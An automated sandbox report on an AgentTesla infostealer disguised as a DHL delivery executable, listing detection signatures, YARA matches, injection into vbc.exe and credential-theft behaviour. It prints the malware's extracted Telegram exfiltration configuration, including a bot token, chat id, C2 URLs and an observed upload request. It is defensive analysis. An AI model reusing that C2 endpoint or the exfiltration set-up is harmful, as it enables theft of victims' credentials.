Edit tour

Windows Analysis Report
Dhl recent package delivery report needs attention.exe

Overview

General Information

Sample Name:	Dhl recent package delivery report needs attention.exe
Analysis ID:	626595
MD5:	163d3bc2c523dc10c959474aa3f69d56
SHA1:	5338e0aaea69b582d22ff624b4a9fd4efc9eb707
SHA256:	1040411f26f6464fb485e92e74c08c559a6feb9bed0eadc44e831a08c80e8a01
Tags:	AgentTeslaDHLexeTelegram
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Yara detected Generic Downloader

.NET source code contains very large array initializations

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to launch a process as a different user

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Creates processes with suspicious names

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Dhl recent package delivery report needs attention.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe" MD5: 163D3BC2C523DC10C959474AA3F69D56)

vbc.exe (PID: 2728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1436982177", "Chat URL": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Dhl recent package delivery report needs attention.exe PID: 6256	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2728	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2728	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vbc.exe PID: 2728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.0.vbc.exe.610000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.3.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.0.vbc.exe.610000.3.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x326bd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x2ff3c:$g6: get_AltKeyDown
2.2.vbc.exe.610000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.vbc.exe.610000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.2.vbc.exe.610000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.vbc.exe.610000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x326bd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x2ff3c:$g6: get_AltKeyDown
2.0.vbc.exe.610000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.1.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.0.vbc.exe.610000.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x326bd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x2ff3c:$g6: get_AltKeyDown
2.0.vbc.exe.610000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.0.vbc.exe.610000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x326bd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x2ff3c:$g6: get_AltKeyDown
1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e56:$s10: logins 0x308bd:$s11: credential 0x2ce03:$g1: get_Clipboard 0x2ce11:$g2: get_Keyboard 0x2ce1e:$g3: get_Password 0x2e11b:$g4: get_CtrlKeyDown 0x2e12b:$g5: get_ShiftKeyDown 0x2e13c:$g6: get_AltKeyDown
2.0.vbc.exe.610000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.4.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.0.vbc.exe.610000.4.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x326bd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x2ff3c:$g6: get_AltKeyDown
1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x67276:$s10: logins 0x326bd:$s11: credential 0x66cdd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x63223:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x63231:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x6323e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x6453b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x6454b:$g5: get_ShiftKeyDown 0x2ff3c:$g6: get_AltKeyDown 0x6455c:$g6: get_AltKeyDown
1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30e56:$s10: logins 0x308bd:$s11: credential 0x2ce03:$g1: get_Clipboard 0x2ce11:$g2: get_Keyboard 0x2ce1e:$g3: get_Password 0x2e11b:$g4: get_CtrlKeyDown 0x2e12b:$g5: get_ShiftKeyDown 0x2e13c:$g6: get_AltKeyDown
2.0.vbc.exe.610000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
2.0.vbc.exe.610000.2.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.0.vbc.exe.610000.2.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x326bd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x2ff3c:$g6: get_AltKeyDown
1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c56:$s10: logins 0x67476:$s10: logins 0x9ba96:$s10: logins 0x326bd:$s11: credential 0x66edd:$s11: credential 0x9b4fd:$s11: credential 0x2ec03:$g1: get_Clipboard 0x63423:$g1: get_Clipboard 0x97a43:$g1: get_Clipboard 0x2ec11:$g2: get_Keyboard 0x63431:$g2: get_Keyboard 0x97a51:$g2: get_Keyboard 0x2ec1e:$g3: get_Password 0x6343e:$g3: get_Password 0x97a5e:$g3: get_Password 0x2ff1b:$g4: get_CtrlKeyDown 0x6473b:$g4: get_CtrlKeyDown 0x98d5b:$g4: get_CtrlKeyDown 0x2ff2b:$g5: get_ShiftKeyDown 0x6474b:$g5: get_ShiftKeyDown 0x98d6b:$g5: get_ShiftKeyDown
Click to see the 33 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1436982177", "Chat URL": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument"}
Source: vbc.exe.2728.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Dhl recent package delivery report needs attention.exe

ReversingLabs: Detection: 36%

Machine Learning detection for sample

Source: Dhl recent package delivery report needs attention.exe

Joe Sandbox ML: detected

Source: Dhl recent package delivery report needs attention.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49770 version: TLS 1.2

Source: Dhl recent package delivery report needs attention.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: POST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6Host: api.telegram.orgContent-Length: 1007Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443

Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: vbc.exe, 00000002.00000002.639895069.0000000006CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: vbc.exe, 00000002.00000002.640666655.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hEsAGj.com
Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Dhl recent package delivery report needs attention.exe	String found in binary or memory: http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
Source: Dhl recent package delivery report needs attention.exe	String found in binary or memory: http://www.smartassembly.com/webservices/Reporting/L
Source: Dhl recent package delivery report needs attention.exe	String found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2
Source: Dhl recent package delivery report needs attention.exe	String found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2v
Source: Dhl recent package delivery report needs attention.exe	String found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/
Source: Dhl recent package delivery report needs attention.exe	String found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/
Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument
Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentdocument-----
Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4Hkp
Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dafa.fa
Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uyuDgc6hArJiFp.org
Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49770 version: TLS 1.2

Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388094558.000000000085B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

.NET source code contains very large array initializations

Source: 2.0.vbc.exe.610000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.cs	Large array initialization: .cctor: array initializer size 11668
Source: 2.0.vbc.exe.610000.4.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.cs	Large array initialization: .cctor: array initializer size 11668
Source: 2.0.vbc.exe.610000.3.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.cs	Large array initialization: .cctor: array initializer size 11668
Source: 2.0.vbc.exe.610000.1.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.cs	Large array initialization: .cctor: array initializer size 11668
Source: 2.2.vbc.exe.610000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.cs	Large array initialization: .cctor: array initializer size 11668

Source: Dhl recent package delivery report needs attention.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_008DF080	2_2_008DF080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_008DF3C8	2_2_008DF3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_008D02C2	2_2_008D02C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_008DF3BD	2_2_008DF3BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_0A104BC8	2_2_0A104BC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_0A1030E8	2_2_0A1030E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_0A101150	2_2_0A101150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_0A104F40	2_2_0A104F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 2_2_0A108780	2_2_0A108780

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Code function: 1_2_049EEF28 CreateProcessAsUserA,

1_2_049EEF28

Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.387791663.0000000000250000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenameAcroCEF.exe> vs Dhl recent package delivery report needs attention.exe
Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.387791663.0000000000250000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenameAcroCEF.exe< vs Dhl recent package delivery report needs attention.exe
Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameoOGLJXHkjIUdDHWuyQTkUEYbpke.exe4 vs Dhl recent package delivery report needs attention.exe
Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameoOGLJXHkjIUdDHWuyQTkUEYbpke.exe4 vs Dhl recent package delivery report needs attention.exe
Source: Dhl recent package delivery report needs attention.exe	Binary or memory string: OriginalFilenameAcroCEF.exe> vs Dhl recent package delivery report needs attention.exe
Source: Dhl recent package delivery report needs attention.exe	Binary or memory string: OriginalFilenameAcroCEF.exe< vs Dhl recent package delivery report needs attention.exe

Source: Dhl recent package delivery report needs attention.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dhl recent package delivery report needs attention.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Dhl recent package delivery report needs attention.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Dhl recent package delivery report needs attention.exe

ReversingLabs: Detection: 36%

Source: Dhl recent package delivery report needs attention.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe "C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe"
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

